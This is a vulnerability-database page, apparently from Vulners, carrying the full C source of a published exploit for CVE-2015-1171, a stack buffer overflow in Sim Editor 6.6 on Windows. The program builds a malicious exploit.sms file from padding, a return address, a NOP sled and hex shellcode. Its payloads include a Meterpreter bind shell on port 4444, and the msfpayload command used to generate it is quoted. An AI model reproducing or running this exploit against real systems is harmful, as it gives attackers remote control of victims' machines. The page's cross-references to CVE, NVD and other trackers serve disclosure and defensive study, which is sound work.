Sim Editor 6.6 - Local Stack Buffer Overflow

🗓️ 16 Jan 2015 00:00:00Reported by Osanda Malith JayathissaType

Stack Buffer Overflow in Sim Editor v6.6 for Window

Reporter	Title	Published	Views	Family All 10
0day.today	Sim Editor 6.6 Buffer Overflow Exploit	17 Jan 201500:00	–	zdt
Circl	CVE-2015-1171	29 May 201815:50	–	circl
CNVD	GSM SIM Utility Stack Buffer Overflow Vulnerability	1 Sep 201500:00	–	cnvd
CVE	CVE-2015-1171	28 Aug 201520:57	–	cve
Cvelist	CVE-2015-1171	28 Aug 201520:57	–	cvelist
exploitpack	Sim Editor 6.6 - Local Stack Buffer Overflow	16 Jan 201500:00	–	exploitpack
Metasploit	GSM SIM Editor 5.15 Buffer Overflow	14 Apr 201205:12	–	metasploit
NVD	CVE-2015-1171	28 Aug 201521:59	–	nvd
Packet Storm	Sim Editor 6.6 Buffer Overflow	16 Jan 201500:00	–	packetstorm
Prion	Stack overflow	28 Aug 201521:59	–	prion

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 65536  

/*
 * Title: Sim Editor v6.6 Stack Based Buffer Overflow
 * Version: 6.6
 * Tested on: Windows XP sp2 en, Windows 8 64-bit
 * Date: 16-01-2015
 * Author: Osanda Malith Jayathissa
 * E-Mail: osanda[cat]unseen.is
 * Website: OsandaMalith.wordpress.com
 * CVE: CVE-2015-1171
 */

const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1" 
        		"3231561503561583eefce2a496ab54" 
        		"46672c07cf821d15abc70ca9b88abc"
        		"42ec3e36263830ff8d1e7f00209ed3"
        		"c222622e17855be16ac49c1c849475"
        		"6a3709f22e8428d424b45251fa41e9"
        		"582bf96612d3712082e25632feadd3"
        		"81752c32d8761e7ab749ae77c98e09"
        		"68bce46915c73f13c142ddb382f505"
        		"454663ce4923e7884db224a36a3fcb"
        		"63fb7be8a7a7d891fe0d8eaee0ea6f"
        		"0b6b187b2d36777abf4d3e7cbf4d11"
        		"158ec6fe620f0dbb9d450fea3500da"
        		"ae5bb331ec6530b38d9128b688deee"
        		"2be14f9b4b566f8e262bff50d1a58b"
        		"92"; 

/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
		"4a83effc315f11035f11e2ca04054e"
		"34f5d62fbd10e77dd9515ab2aa3457"
		"39feacec4fd6c345e500ed56cb8ca1"
		"954d70b8c9ad49731caf8e6eeffd47"
		"e44212ecb85e99be2ce77e744cc6d0"
		"0317c8d3c02341cc050f1b67fdfb9a"
		"a1cc04ad8d823a0100db7ba6fbae77"
		"d486a843a65c3d560016e5b2b0fb73"
		"30beb0f01ea347d514dfccd8fa6996"
		"fede324c9f479f23a098479b04d26a"
		"c831b9e23d7342f3290431c1f6bedd"
		"697e18198d55dcb570561c9fb6024c"
		"b71f2b07479ffe87170f5167c8ef01"
		"0f02e07e2f2d2a179e098670e2ad38"
		"dd6b4b50cd3dc3cd2f1adc6a4f4970"
		"22c7c69ef4e8d7b45644705f2d8645"
		"7e3283ee17a5597e55575dab0f97cb"
		"5786c06355ff272ca62a3ce532952b"
		"0ad215ac5cb815c4389845f14635fa"
		"aad2b5ab1f74dd5179b242a9ac42bf"
		"7c89c0c90af908";

const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;

int menu() {
    size_t shell_type = SHELLS_COUNT;
    puts("\b[?] Choose an Option: ");
    size_t i;
    for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
    scanf("%i", &shell_type);
	return shell_type;
}

void banner() {
    static const char banner[] =                                                                                                
                " _____ _          _____   _ _ _           \n"
                "|   __|_|_____   |   __|_| |_| |_ ___ ___ \n"
                "|__   | |     |  |   __| . | |  _| . |  _|\n"
                "|_____|_|_|_|_|  |_____|___|_|_| |___|_|\n"
                "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
                "[~] Author: Osanda Malith Jayathissa\n"
                "[~] E-Mail: osanda[cat]unseen.is\n"
                "[~] Website: OsandaMalith.wordpress.com\n\n";

    fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}

void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
    size_t pattern_len = strlen(pattern);
    count *= pattern_len;
    if (count > dst_size) count = dst_size;
    if (pattern_len > dst_size) pattern_len = dst_size;

    size_t i, pI;
    for (i = 0, pI = 0; i < count ; i++, pI++) {
        if (pI == pattern_len) pI = 0;
        dst[i] = pattern[pI];
    }
}

int main() {
    banner();
    int shell_type = menu();
    if (shell_type >= SHELLS_COUNT) {
        printf("[-] Enter a valid input\n");
        exit (1);
    }

    char *buff = (char*) calloc (SIZE, sizeof(char));
    char *nops = (char*) calloc (SIZE, sizeof(char));
    if (!buff || !nops) exit (1);

    patternfill(buff, "41", 405, SIZE);
    patternfill(nops, "90", 16, SIZE);

    char ret[] = "B3804200";
    const char* filename = "exploit.sms";

    FILE *outfile = fopen(filename, "w");
    if (!outfile) {
        printf("%s\n","Could not open file");
        exit (1);
    }

    fputs(buff,   outfile);
    fputs(ret,    outfile);
    fputs(nops,   outfile);

    fputs(shells[shell_type],  outfile);
    printf("%s", shell_info[shell_type]);
    fclose(outfile);
    free(buff);
    printf("[+] Successfully to written to: \"%s\"\n", filename); 
    return 0;
}
/*EOF*/

16 Jan 2015 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 210

EPSS0.76868

sim editor v6.6 stack buffer overflow windows xp windows 8 cve-2015-1171 osanda malith jayathissa buffer overflow shell buffer nops